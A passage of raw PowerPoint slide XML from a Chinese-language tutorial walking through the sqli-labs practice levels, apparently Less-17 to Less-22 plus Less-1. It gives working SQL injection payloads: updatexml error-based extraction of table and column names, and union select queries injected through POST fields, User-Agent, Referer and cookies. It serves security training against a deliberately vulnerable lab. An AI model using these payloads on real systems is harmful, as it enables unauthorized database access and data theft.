              <a:t>文档对象的名称，文中为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Doc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XPath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式的字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，如果不了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语法，可以在网上查找教程。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式，替换查找到的符合条件的数据 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作用：改变文档中符合条件的节点的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XPATH_string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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而我们的注入语句为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(SELECT username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0,1),0x7e),1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数是将其连成一个字符串，因此不会符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XPATH_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的格式，从而出现格式错误，爆出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'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635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600364"/>
            <a:ext cx="11762509" cy="5834303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先在代码中加入两行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:  echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;              echo “&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;”;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而且要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后也加上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>get_magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分开验证，而且在验证的时候对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行了过滤处理，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行了转义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先我们要知道用户的名字是多少，然后才可以进行接下来的操作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adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name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=’security‘ limit 0,1),0x7e),1)#&amp;submit=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过查询，可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库下面的其中一个表名字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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admin&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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=’users‘ limit 0,1),0x7e),1)#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同样的方法可以获得其他的数据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369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Less-18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600364"/>
            <a:ext cx="11762509" cy="583430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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(database()),0x7e),1) and ’1‘= ‘1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册登录再注入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登录失败显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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登录成功显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. $insert="INSERT INTO `security`.`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uagents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>` (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>`, `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>`, `username`) VALUES ('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>', '$IP', $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)";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分析后得知，需要进行闭合操作，两种方法：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' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(database())),1) and '1'=‘1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it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or updatexml(1,concat(0x7e,(database())),1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>, ‘’)# (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意在直接复制的时候，可能出现错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句进行操作即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p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2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Less-19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600364"/>
            <a:ext cx="11762509" cy="583430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内容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(database()),0x7e),1) and ’1‘= ‘1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册登录再注入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登录成功显示的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer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登录失败是没有回显信息的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. $insert="INSERT INTO `security`.`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>referers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>` (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>`, `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>`) VALUES ('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>', '$IP')";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分析后得知，需要进行闭合操作，两种方法：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' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1,concat(0x7e,(database())),1) and '1'=‘1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it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or updatexml(1,concat(0x7e,(database())),1), ‘’)#  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意在直接复制的时候，可能出现错误，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式的问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句进行操作即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p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7733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Less-20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600364"/>
            <a:ext cx="11762509" cy="583430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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册登录再注入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登录成功之后会显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie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登录失败会显示失败信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=“SELECT * FROM users WHERE username=‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cookee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ LIMIT 0,1”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在登录之后后台会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，再次登录的时候，只要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有过期，就会去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里面取值，然后进行查询。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Cookie Editor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zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,2,database()#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接下来就是常见的注入教程。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8726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Less-21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600364"/>
            <a:ext cx="11762509" cy="583430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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册登录再注入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登录成功之后会显示一系列信息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登录失败会显示失败信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关相似，只不过这一次将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    YWRtaW4=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解码之后为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Cookie Editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. ') union select 1,2,database()#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接下来就是常见的注入教程。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276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4260-E0E5-48DC-8526-89A979C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24" y="207819"/>
            <a:ext cx="10131425" cy="52542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Less-22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C6D2-EB3D-477B-9B8C-817E754C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600364"/>
            <a:ext cx="11762509" cy="583430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以下均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册登录再注入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登录成功之后会显示一系列信息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登录失败会显示失败信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关相似，只不过这一次将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Cookie Editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. “ union select 1,2,database()#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接下来就是常见的注入教程。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41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B1986-C22A-4B1A-A99E-1030AC9D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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码中，加入以下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql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echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301051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38545"/>
            <a:ext cx="11319164" cy="6996546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http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-1/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.   http://127.0.0.1/sqli/Less-1/?id=1‘ order by 3--+   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看哪些数据可以回显</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看当前数据库</a:t>
            </a:r>
